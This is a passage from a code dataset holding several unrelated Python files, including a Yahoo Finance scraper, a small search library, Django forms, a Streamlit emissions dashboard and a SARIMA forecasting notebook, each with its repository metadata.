print(str(percent_done)+\"% Completed\")\n\n try:\n Profile = Profile_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Profile = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Executives = Profile_Extract2(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Executives = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Income_Statement_Annual = Financial_Extract(Company_name, \"financials\",1)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Income_Statement_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Income_Statement_Quarterly = Financial_Extract_Quarterly(Company_name, \"financials\",1)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Income_Statement_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Balance_Sheet_Annual = Financial_Extract(Company_name, \"balance-sheet\",2)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Balance_Sheet_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Balance_Sheet_Quarterly = Financial_Extract_Quarterly(Company_name, \"balance-sheet\",2)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Balance_Sheet_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n 
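        # Editorial sketch (an assumption, not in the original source): the many near-identical
        # try/except blocks in main_fun could be collapsed into a small helper. The name
        # `safe_extract` and the `progress` list are hypothetical:
        #
        # def safe_extract(extract_fn, fallback_fn, progress, step=5.5):
        #     # Run one extractor; on any failure fall back to an error DataFrame,
        #     # then advance and print the shared progress counter either way.
        #     try:
        #         result = extract_fn()
        #     except Exception:
        #         result = fallback_fn()
        #     progress[0] += step
        #     print(str(progress[0]) + "% Completed")
        #     return result
        #
        # progress = [0]
        # Summary = safe_extract(lambda: Summary_Extract(Company_name_list, Company_name),
        #                        lambda: pd.DataFrame(error_list), progress)
        #
        # Note that a fallback must be *called*: the Historical_Extract branch above assigns
        # the bare function object (`Error_Extract2` without parentheses), which would fail
        # at tuple unpacking; `Error_Extract2()` is almost certainly what was intended.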
try:\n Cash_Flow_Annual = Financial_Extract(Company_name, \"cash-flow\",3)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Cash_Flow_Annual = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Cash_Flow_Quarterly = Financial_Extract_Quarterly(Company_name, \"cash-flow\",3)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Cash_Flow_Quarterly = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates = Analysis_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates = Error_Extract()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n \n try:\n Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders = Holders_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders = Error_Extract2()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n \n try:\n Insider_Roster = Insider_Roster_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Insider_Roster = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Ins_Transac_6_mo,Net_Institutional_Transac = Insider_Transactions_Extract1(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Ins_Transac_6_mo,Net_Institutional_Transac = Error_Extract3()\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Insider_Transac_2_yr = Insider_Transactions_Extract2(Company_name)\n percent_done = 100\n print(str(percent_done)+\"% Completed\")\n except:\n Insider_Transac_2_yr = pd.DataFrame(error_list)\n percent_done = 100\n print(str(percent_done)+\"% Completed\")\n\n # if(lossy_flag==1):\n # lossy_tickers.append(Company_name)\n #--------------------------------------------------------------Saving all the dataframes into the excel file\n\n #dflist= [Income_Statement_Annual,Balance_Sheet_Annual,Cash_Flow_Annual]\n dflist= [Profile,News,Press,Executives,Summary,Statistics,Historical_Data,Dividends,Splits,Income_Statement_Annual,Income_Statement_Quarterly,Balance_Sheet_Annual,Balance_Sheet_Quarterly,Cash_Flow_Annual,Cash_Flow_Quarterly,Earnings_Estimate,Revenue_Estimate,Earnings_History_DF,EPS_Trend,EPS_Revisions,Growth_Estimates,Major_Holders,Top_Institutional_Holders2,Top_Mutual_Fund_Holders,Insider_Roster,Ins_Transac_6_mo,Net_Institutional_Transac,Insider_Transac_2_yr]\n for i in dflist:\n for col in i.columns[1:]:\n try:\n i[col] = i[col].str.replace(',', '').astype(float)\n except:\n i[col] = i[col]\n \n # We'll define an Excel writer object and the target file\n Excel_File_Name = str(exceldate) + '_' + Company_name + \".xlsx\"\n Excelwriter = pd.ExcelWriter(Excel_File_Name,engine=\"xlsxwriter\",engine_kwargs={'options': {'strings_to_numbers': False}})\n\n sheet_list = []\n #We now loop process the list of dataframes\n for df in dflist:\n sheet_list.append(retrieve_name(df)[0])\n df.to_excel(Excelwriter, sheet_name=retrieve_name(df)[0],index=False)\n\n # Profile.to_excel(Excelwriter,sheet_name='Result',startrow=1 , startcol=0)\n # Executives.to_excel(Excelwriter,sheet_name='Result',startrow=Profile.shape[0] + 5, 
startcol=0)\n\n for sheet1 in sheet_list:\n # Auto-adjust columns' width\n try:\n for column in df:\n try:\n #ExcelWriter.sheets[sheet1].write(0,column,val,header_format)\n column_width = max(df[column].astype(str).map(len).max(), len(column))\n col_idx = df.columns.get_loc(column)\n Excelwriter.sheets[sheet1].set_column(col_idx, col_idx, column_width)\n except:\n continue\n except:\n continue\n\n #And finally save the file\n Excelwriter.save()\n \n print(\"EXCEL FILE DOWNLOADED SUCCESSFULLY FOR --->\",Company_name)\n \n print(\"DOWNLOADED TICKERS FOR: \",Company_name_list)\n\n if(len(wrong_tickers)>0):\n print(\"PLEASE ENTER CORRECT TICKER NAMES FOR THE FOLLOWING TICKER(s)--->\",wrong_tickers)\n\n # if(len(lossy_tickers)>0):\n # print(\"SOME OF THE DATA WAS LOST WHILE SCRAPING THESE TICKER(s)--->\",lossy_tickers)\n\n \n Company_name_list = []\n while(1):\n user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING AND START EXTRACTING): \")\n if(user_input==\"START\"):\n break\n Company_name_list.append(user_input)\n\n wrong_tickers = []\n for i in Company_name_list:\n test_URL = \"https://finance.yahoo.com/quote/\" + i\n driver.get(test_URL)\n if(\"lookup\" in str(driver.current_url)):\n wrong_tickers.append(i)\n del i\n \n\n main_fun(Company_name_list,wrong_tickers)\n\n\n\ndef test(Company_name):\n df1 = News_Extract(Company_name)\n df2 = Press_Extract(Company_name)\n\n dflist= [df1,df2]\n # for col in Income_Statement_Annual.columns[1:]:\n # try:\n # Income_Statement_Annual[col] = Income_Statement_Annual[col].str.replace(',', '').astype(float)\n # except:\n # Income_Statement_Annual[col] = Income_Statement_Annual[col]\n\n Excel_File_Name = Company_name + \".xlsx\"\n Excelwriter = pd.ExcelWriter(Excel_File_Name,engine=\"xlsxwriter\",engine_kwargs={'options': {'strings_to_numbers': False}})\n\n for df in dflist:\n df.to_excel(Excelwriter, sheet_name=retrieve_name(df)[0],index=False)\n Excelwriter.save()\n\n#---------------------------------------------------------------------------CALL FUNCTIONS---------------------------------------------------\n\n# def correct_url_checker():\n# user_input_fun = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING TICKERS): \")\n# if(user_input_fun==\"START\"):\n# return \"START\"\n# print(\"PROCESSING....\")\n# test_URL = \"https://finance.yahoo.com/quote/\" + user_input_fun\n# driver.get(test_URL)\n# if(\"lookup\" in str(driver.current_url)):\n# print(\"PLEASE ENTER A VALID TICKER FOR \"+str(user_input_fun))\n# return correct_url_checker()\n# else:\n# return user_input_fun\n\n# Company_name_list = []\n# while(1):\n# user_input = correct_url_checker()\n# if(user_input==\"START\"):\n# break\n# Company_name_list.append(user_input)\n\n# main_fun(Company_name_list)\n\n\n\nCompany_name_list = []\nwhile(1):\n user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING AND START EXTRACTING): \")\n if(user_input==\"START\"):\n break\n Company_name_list.append(user_input)\n\nwrong_tickers = []\nfor i in Company_name_list:\n test_URL = \"https://finance.yahoo.com/quote/\" + i\n driver.get(test_URL)\n if(\"lookup\" in str(driver.current_url)):\n wrong_tickers.append(i)\n Company_name_list.remove(i)\n\n#print(Company_name_list)\nif(len(wrong_tickers)>0):\n print(\"INCORRECT TICKERS, ENTER PROPERLY IN THE NEXT RUN-->\",wrong_tickers)\n\nmain_fun(Company_name_list,wrong_tickers)\n\n\n\n\n\n\n\n\n\n#test(\"IBM\")\n\n\n#--------------------------------------------------------------Close and 
Exit\ndriver.close()\n\n\n","repo_name":"Swapnil0115/Finance-Data-Scraper","sub_path":"Yahoo_Fin_v6/main_version_6.py","file_name":"main_version_6.py","file_ext":"py","file_size_in_byte":42883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"27747485350","text":"import os\n\nfrom main import choice_char_class, start_training\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndir_files = [filename.lower() for filename in os.listdir(BASE_DIR)]\n\nfiles_list = ['main.py', 'readme.md']\n\n\ndef test_program():\n for filename in files_list:\n assert filename in dir_files, f'Файл `{filename}` не найден'\n\n\ndef main():\n print('Приветствую тебя, искатель приключений!')\n print('Прежде чем начать игру...')\n char_name = input('...назови себя: ')\n print(f'Здравствуй, {char_name}! '\n 'Сейчас твоя выносливость — 80, атака — 5 и защита — 10.')\n print('Ты можешь выбрать один из трёх путей силы:')\n print('Воитель, Маг, Лекарь')\n char_class = choice_char_class()\n print(start_training(char_name, char_class))\n main()\n","repo_name":"total-art/character_creation_module","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"4"} +{"seq_id":"28941963858","text":"import pickle\nfrom os import PathLike\nfrom typing import Generic, List, Literal, Optional, Tuple, Type, TypeVar, Union, overload\n\nfrom tinysearch.indexers import Indexer\nfrom tinysearch.storages import Storage\nfrom tinysearch.typing import Analyzer, Document, Matrix\nfrom tinysearch.vectorizers import Vectorizer\n\nSelf = TypeVar(\"Self\", bound=\"TinySearch\")\n\n\nclass TinySearch(Generic[Document, Matrix]):\n def __init__(\n self,\n storage: Storage[Document],\n indexer: Indexer[Matrix],\n vectorizer: Vectorizer[Matrix],\n analyzer: Analyzer,\n ) -> None:\n self.storage: Storage[Document] = storage\n self.indexer: Indexer[Matrix] = indexer\n self.vectorizer: Vectorizer[Matrix] = vectorizer\n self.analyzer = analyzer\n\n @overload\n def search(\n self,\n query: str,\n *,\n topk: Optional[int] = ...,\n ) -> List[Document]:\n ...\n\n @overload\n def search(\n self,\n query: str,\n *,\n return_scores: Literal[False],\n topk: Optional[int] = ...,\n ) -> List[Document]:\n ...\n\n @overload\n def search(\n self,\n query: str,\n *,\n return_scores: Literal[True],\n topk: Optional[int] = ...,\n ) -> List[Tuple[Document, float]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n topk: Optional[int] = ...,\n ) -> List[List[Document]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n return_scores: Literal[False],\n topk: Optional[int] = ...,\n ) -> List[List[Document]]:\n ...\n\n @overload\n def search(\n self,\n query: List[str],\n *,\n return_scores: Literal[True],\n topk: Optional[int] = ...,\n ) -> List[List[Tuple[Document, float]]]:\n ...\n\n def search(\n self,\n query: Union[str, List[str]],\n *,\n return_scores: bool = False,\n topk: Optional[int] = 10,\n ) -> Union[List[Document], List[Tuple[Document, float]], List[List[Document]], List[List[Tuple[Document, float]]]]:\n return_as_batch = True\n if isinstance(query, str):\n query = [query]\n return_as_batch = False\n\n batched_tokens = [self.analyzer(q) for q in query]\n query_vector = self.vectorizer.vectorize_queries(batched_tokens)\n results = self.indexer.search(query_vector, topk=topk)\n\n output: Union[List[List[Document]], List[List[Tuple[Document, 
float]]]]\n if return_scores:\n output = [[(self.storage[id_], score) for id_, score in result] for result in results]\n else:\n output = [[self.storage[id_] for id_, _ in result] for result in results]\n if return_as_batch:\n return output\n return output[0]\n\n def save(self, filename: Union[str, PathLike]) -> None:\n with open(filename, \"wb\") as pklfile:\n pickle.dump(self, pklfile)\n\n @classmethod\n def load(cls: Type[Self], filename: Union[str, PathLike]) -> Self:\n with open(filename, \"rb\") as pklfile:\n searcher = pickle.load(pklfile)\n if not isinstance(searcher, cls):\n raise TypeError(f\"Expected type {cls.__name__}, got {type(searcher).__name__}\")\n return searcher\n","repo_name":"altescy/tinysearch","sub_path":"tinysearch/tinysearch.py","file_name":"tinysearch.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"4"} +{"seq_id":"32286854969","text":"from django import forms\nfrom django.forms import DateInput\nfrom django.forms import DateTimeInput\n# from django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User \nfrom .models import *\n\nclass NewPatientForm(forms.ModelForm):\n class Meta:\n model = Patient\n fields = '__all__'\n widgets = {\n 'birthday': DateInput(attrs={'type': 'date'}),\n }\n\nclass DiagnosisForm(forms.ModelForm): \n class Meta:\n model = PatientHasDiagnosis\n fields = '__all__'\n\nclass CheckUpForm(forms.ModelForm):\n class Meta:\n model = Condition_Check_UP\n fields = '__all__'\n\nclass AllergensForm(forms.ModelForm):\n class Meta:\n model = PatientHasAllergy\n fields = '__all__'\n widgets = {\n 'allergy': forms.CheckboxSelectMultiple\n }\n\nclass NewAppointment(forms.ModelForm):\n class Meta:\n model = NextAppointment\n fields = ['patient', 'staff', 'receptionits', 'date']\n widgets = {\n 'date': DateTimeInput(attrs={'type': 'datetime-local'}),\n }\n\nclass CreateUserForm(UserCreationForm):\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']","repo_name":"niqolla/hospital_managment_app_django","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"35511613673","text":"def createExpLog(logFile, currentExperiment):\n f_log = open(logFile, 'a+') # open file for appending and reading. 
Current position is at end of file\n \n f_log.seek(0) # set current position at start of file\n \n line = f_log.readline()[0:-1] # discard the \\n at the end of the line\n while line:\n if line == currentExperiment:\n f_log.close()\n return\n \n # read another line until EOF\n line = f_log.readline()[0:-1] \n \n if not f_log.closed:\n # if function got to this point, means that currentExperiment is not in logFile\n f_log.write(currentExperiment + '\\n')\n f_log.close()\n \n","repo_name":"pabloj100000/work","sub_path":"ExpLog/createExpLog.py","file_name":"createExpLog.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70121084919","text":"from IPython.lib.latextools import latex_to_png\nfrom IPython.testing import decorators as dec\n# use @dec.skipif_not_sympy to skip tests requiring sympy\n\ntry:\n from sympy import pretty, latex\nexcept ImportError:\n pass\n\n\n#-----------------------------------------------------------------------------\n# Definitions of magic functions for use with IPython\n#-----------------------------------------------------------------------------\n\ndef print_basic_unicode(o, p, cycle):\n \"\"\"A function to pretty print sympy Basic objects.\"\"\"\n if cycle:\n return p.text('Basic(...)')\n out = pretty(o, use_unicode=True)\n if '\\n' in out:\n p.text('\\n')\n p.text(out)\n\n\ndef print_png(o):\n \"\"\"A function to display sympy expression using LaTex -> PNG.\"\"\"\n s = latex(o, mode='inline')\n # mathtext does not understand certain latex flags, so we try to replace\n # them with suitable subs.\n s = s.replace('\\\\operatorname','')\n s = s.replace('\\\\overline', '\\\\bar')\n png = latex_to_png(s)\n return png\n\n_loaded = False\n\ndef load_ipython_extension(ip):\n \"\"\"Load the extension in IPython.\"\"\"\n global _loaded\n if not _loaded:\n plaintext_formatter = ip.display_formatter.formatters['text/plain']\n\n for cls in (object, tuple, list, set, frozenset, dict, str):\n plaintext_formatter.for_type(cls, print_basic_unicode)\n\n plaintext_formatter.for_type_by_name(\n 'sympy.core.basic', 'Basic', print_basic_unicode\n )\n plaintext_formatter.for_type_by_name(\n 'sympy.matrices.matrices', 'Matrix', print_basic_unicode\n )\n\n png_formatter = ip.display_formatter.formatters['image/png']\n\n png_formatter.for_type_by_name(\n 'sympy.core.basic', 'Basic', print_png\n )\n _loaded = True\n\n","repo_name":"jupyter-attic/ipython-py3k","sub_path":"IPython/extensions/sympyprinting.py","file_name":"sympyprinting.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"4"} +{"seq_id":"8187672203","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom pymongo import MongoClient\nimport datetime as dt\nfrom datetime import datetime\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.dates import DateFormatter, MinuteLocator\nimport plotly.express as px\nimport altair as alt\n\n\ndef main():\n st.set_page_config(layout='wide')\n\n st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n \n mongo_client = MongoClient(**st.secrets[\"mongo\"])\n db = mongo_client.watt_time\n\n st.write('''\n # The Cleanest Time to Clean!\n Or play video games, make a smoothie, use power tools, plug in your electric [bike, moped, motorcycle, car], etc. 
\n Basically anything that involves using electricity!\n ''')\n st.text(\"\")\n st.write('''\n - Simply select your electricity grid region\n - Observe the forecasted Marginal Operating Emissions Rate (MOER) value\n - If it's low, you're good to go!\n ''')\n st.text(\"\")\n st.text(\"\")\n \n\n col3, col4, col5 = st.columns([20,5,1])\n with col3:\n #st.markdown('
Created with MOER
', unsafe_allow_html=True)\n st.write('Created with real-time and historical MOER values from')\n with col4:\n st.image('./watttime_logo.png')\n with col5:\n st.write('API')\n \n\n st.markdown('
Select your Grid Region
', unsafe_allow_html=True)\n BA = st.selectbox('', ['CAISO_NORTH'])\n ba_heatmap = BA + '_heatmap'\n ba_dailyline = BA + '_dailyline'\n ba_weeklyline = BA + '_weeklyline'\n\n heatmap_df = pd.DataFrame(list(db[ba_heatmap].find({}, {'_id': 0, 'year': 1, 'month': 1, 'weekday': 1, 'time': 1, 'value': 1})))\n dailyline_df = pd.DataFrame(list(db[ba_dailyline].find({}, {'_id': 0, 'time': 1, 'forecast': 1, 'moer_today': 1,\n 'moer_1week': 1, 'moer_2week': 1, 'moer_3week': 1})))\n weeklyline_df = pd.DataFrame(list(db[ba_weeklyline].find({}, {'_id': 0, 'point_time': 1, 'forecast': 1, 'moer_today': 1,\n 'moer_1week': 1, 'moer_2week': 1, 'moer_3week': 1})))\n\n st.text(\"\")\n\n \n # display daily line chart\n\n st.write(\n ''' \n ## **Daily Forecast**\n ''')\n \n st.write('''\n #### Choose previous week(s) by number to compare and contrast:\n '''\n )\n\n fig2, ax2 = plt.subplots()#figsize = (24, 18))\n\n weeks = st.multiselect(\"\", [1, 2, 3])\n\n plt.plot(dailyline_df['time'], dailyline_df['forecast'], label = \"Today's Forecast\", linestyle=\"-\")\n plt.plot(dailyline_df['time'], dailyline_df['moer_today'], label = \"Today's Actual\", linestyle=\"--\")\n\n if (1 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_1week'], label = \"1 Week Ago Today\", linestyle=\"-.\")\n if (2 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_2week'], label = \"2 Weeks Ago Today\", linestyle=\"--\")\n if (3 in weeks):\n plt.plot(dailyline_df['time'], dailyline_df['moer_3week'], label = \"3 Weeks Ago Today\", linestyle=\"--\")\n plt.xlabel('Time of Day')\n plt.ylabel('MOER Value')\n \n x_ticks = np.arange(0, 288, 12)\n plt.xticks(x_ticks, rotation = 45)\n plt.legend()\n st.pyplot(fig2)\n\n # display historical moer as an interactive heatmap\n st.write('''\n ## **Actual MOER Values** #### \n ### **By Weekday and Time of Day**''')\n \n col1, col2 = st.columns([1, 5])\n col1.markdown('
Select Year
', unsafe_allow_html=True)\n select_year = col1.radio('', heatmap_df['year'].unique())\n st.markdown('
Select Time of Day of MOER Value
', unsafe_allow_html=True)\n st.text(\"(Time in UTC - Add 7 hours for PST)\")\n slider_time = st.slider('',\n datetime.strptime(heatmap_df['time'].unique().min(), '%H:%M:%S').time(),\n datetime.strptime(heatmap_df['time'].unique().max(), '%H:%M:%S').time())\n slider_time = slider_time.strftime('%H:%M:%S')\n\n\n fig, ax = plt.subplots()#figsize = (24, 18))\n # ax.set_title('Monthly MOER values by Day of the Week')\n\n # prepare data for heatmap: filter, then transform into matrix\n df = heatmap_df[(heatmap_df['year'] == select_year) &\n (heatmap_df['time'] == slider_time)].reset_index().copy()\n\n day_month = {1: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 2: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 3: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 4: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 5: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 6: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0},\n 7: {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0, 10: 0, 11: 0, 12: 0}}\n \n for i in range(len(df)):\n day_month[df.loc[i]['weekday']][df.loc[i]['month']] = df.loc[i]['value']\n \n data_rows = list(day_month.values())\n heatmap_data = []\n\n for i in range(0, len(data_rows)):\n heatmap_data.append(list(data_rows[i].values()))\n \n sns.heatmap(data = heatmap_data, square=True, cbar_kws={\"shrink\": .6},\n xticklabels = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',\n 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'],\n yticklabels = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'])\n col2.pyplot(fig)\n\n # display weekly line chart\n\n st.write(\n ''' \n ## **Weekly Forecast**\n ''')\n \n st.write('''\n #### Choose previous weeks to compare and contrast:\n '''\n )\n\n fig3, ax3 = plt.subplots()\n\n weekly_weeks = st.multiselect(\"\", [\"One Week\", \"Two Weeks\", \"Three Weeks\"])\n\n plt.plot(weeklyline_df['point_time'], weeklyline_df['forecast'], label = \"This Week's Forecast\", linestyle=\"-\")\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_today'], label = \"This Week's Actual\", linestyle=\"--\")\n\n if (\"One Week\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_1week'], label = \"1 Week Ago\", linestyle=\"-.\")\n if (\"Two Weeks\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_2week'], label = \"2 Weeks Ago\", linestyle=\"--\")\n if (\"Three Weeks\" in weekly_weeks):\n plt.plot(weeklyline_df['point_time'], weeklyline_df['moer_3week'], label = \"3 Weeks Ago\", linestyle=\"--\")\n plt.xlabel('Day and Time')\n plt.ylabel('MOER Value')\n \n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))\n plt.gca().xaxis.set_major_locator(mdates.DayLocator())\n plt.gcf().autofmt_xdate()\n \n plt.legend()\n st.pyplot(fig3)\n\nif __name__ == '__main__':\n main()\n","repo_name":"charliedogmel/Engineering_Project","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":7226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"7836691836","text":"#exceptions = events detected during execution that interrupts the flow of a program\r\n\r\ndef divide():\r\n num = int(input(\"Enter a numerator: \"))\r\n den = int(input(\"Enter a denominator: \"))\r\n result = num / den\r\n return 
result\r\n\r\n#print(divide())\r\n\r\n#what happens if we divide by zero\r\n\r\n\"\"\" Traceback (most recent call last):\r\n File \"fileName\", line 9, in \r\n print(divide())\r\n File \"fileName\", line 6, in divide\r\n result = num / den\r\nZeroDivisionError: division by zero \"\"\"\r\n\r\n#use a try statement to test dangerous code\r\n\r\ntry:\r\n num = int(input(\"Enter a numerator: \"))\r\n den = int(input(\"Enter a denominator: \"))\r\n result = num / den\r\nexcept ZeroDivisionError as e:\r\n print(e)\r\n print(\"You can't divide by 0 !\")\r\nexcept ValueError as e:\r\n print(e)\r\n print(\"Enter only numbers.\")\r\nexcept Exception:\r\n print(\"Something went wrong...\")\r\n#when there are no more exceptions left\r\nelse:\r\n print(result)\r\n#this is always at the end. Even if we catch an exception, we will always run this block of code\r\n#useful for closing files when dealing with files\r\nfinally:\r\n print(\"This will always execute\")\r\n\r\n#now the try will catch the exception and continue running the code without being interrupted\r\n#you can catch multiple exceptions\r\n#don't just use \"Exceptions\" because it is considered bad practice\r\n","repo_name":"Nickthecan/LearningPython","sub_path":"exceptionHandling.py","file_name":"exceptionHandling.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31732766077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# $$\\large \\color{green}{\\textbf{Optimizing the SARIMA algorithm}}$$ \n# \n# $$\\large \\color{blue}{\\textbf{Phuong Van Nguyen}}$$\n# $$\\small \\color{red}{\\textbf{ phuong.nguyen@summer.barcelonagse.eu}}$$\n# \n# \n# This Machine Learning program was written by Phuong V. Nguyen, based on the $\\textbf{Anacoda 1.9.7}$ and $\\textbf{Python 3.7}$.\n# \n# \n# $$\\underline{\\textbf{Main Contents}}$$\n# \n# $\\text{1. Main Job:}$ The SARIMA algorithm is one of the most common forecasting tools. An optimal SARIMA would make a better forecast for a number of interesting time-series variables. Thus, the main purpose of this project is to introduce how to optimize SARIMA algorithm. Three criteria, such as Akaike Information Criterion (AIC), Bayesian Information Criterion (BIC), and Log-Likelihood, are used to choose the optimal SARIMA model.\n# \n# $\\text{2. 
Dataset:}$ \n# \n# One can download the dataset used to replicate my project from my repository on GitHub, at the link below\n# \n# https://github.com/phuongvnguyen/Optimizing-the-SARIMA-algorithm\n# \n\n# # Preparing Problem\n# \n# ## Loading Libraries\n# \n# \n\n# In[2]:\n\n\nimport warnings\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom statsmodels.tsa.arima_model import ARIMA\n#import pmdarima as pm\nwarnings.filterwarnings(\"ignore\")\nplt.style.use('fivethirtyeight')\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib\nmatplotlib.rcParams['axes.labelsize'] = 14\nmatplotlib.rcParams['xtick.labelsize'] = 12\nmatplotlib.rcParams['ytick.labelsize'] = 12\nmatplotlib.rcParams['text.color'] = 'k'\n\n\n# ## Defining some variables for printing the result\n\n# In[3]:\n\n\nPurple= '\\033[95m'\nCyan= '\\033[96m'\nDarkcyan= '\\033[36m'\nBlue = '\\033[94m'\nGreen = '\\033[92m'\nYellow = '\\033[93m'\nRed = '\\033[91m'\nBold = \"\\033[1m\"\nReset = \"\\033[0;0m\"\nUnderline= '\\033[4m'\nEnd = '\\033[0m'\n\n\n# ## Loading Dataset\n\n# In[24]:\n\n\ndata = pd.read_excel(\"data.xlsx\")\ndata.head(5)\n\n\n# In[25]:\n\n\nclosePrice = data[['DATE','CLOSE']]\nclosePrice.head(5)\n\n\n# In[26]:\n\n\nclosePrice =closePrice.set_index('DATE')\nclosePrice.head()\n\n\n# In[27]:\n\n\nclosePrice.index\n\n\n# This is $NOT$ good yet. An appropriate method for filling the missing data (for instance, forward-filling after calling $\\textbf{asfreq()}$) should be applied.\n\n# # Optimizing model \n\n# We are going to apply one of the most commonly used methods for time-series forecasting, known as ARIMA, which stands for Autoregressive Integrated Moving Average.\n# \n# ARIMA models are denoted with the notation $ARIMA(p, d, q)$. These three parameters are the autoregressive order (p), the degree of differencing (d), and the moving-average order (q):\n\n# ## Find the Optimal ARIMA Model\n\n# This step is parameter selection for the ARIMA time-series model of the closing price. Our goal here is to use a “grid search” to find the optimal set of parameters that yields the best performance for our model.\n\n# ## Setting a set of hyperparameters\n\n# In[41]:\n\n\np = d = q = range(0, 3)\npdq = list(itertools.product(p, d, q))\npdq\n\n\n# In[42]:\n\n\nprint(Bold + 'A Number of combinations: {}'.format(len(pdq)))\n\n\n# In[43]:\n\n\nprint(Bold + 'Examples of parameter combinations for ARIMA...' 
